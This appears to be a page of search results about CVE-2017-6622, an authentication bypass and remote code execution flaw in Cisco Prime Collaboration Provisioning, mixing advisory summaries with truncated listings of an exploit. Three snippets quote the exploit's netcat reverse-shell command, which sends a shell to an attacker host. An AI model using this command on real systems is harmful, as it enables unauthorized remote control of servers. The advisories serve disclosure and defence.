6 matches found
Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability
Added: 10/25/2017 CVE: CVE-2017-6622 BID: 98520 Background The Cisco Prime Collaboration product family facilitates installation and maintenance of Cisco Unified Communications and Cisco TelePresence components, as well as the provisioning of users and services. Problem Missing security constrain...
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution Exp
Exploit for hardware platform in category remote exploits Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat...
Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution
Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "...
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...
Cisco Prime Collaboration Provisioning ScriptMgr Authentication Bypass (CVE-2017-6622)
An authentication bypass vulnerability has been reported in Cisco Prime Collaboration Provisioning. The vulnerability is due to insufficient validation on user supplied paths when a request is sent to ScriptMgr servlet. A remote, unauthenticated attacker can exploit this vulnerability by sending ...
Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco Prime Collaboration Provisioning. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ScriptMgr servlet, which listens on TCP port 443 by default...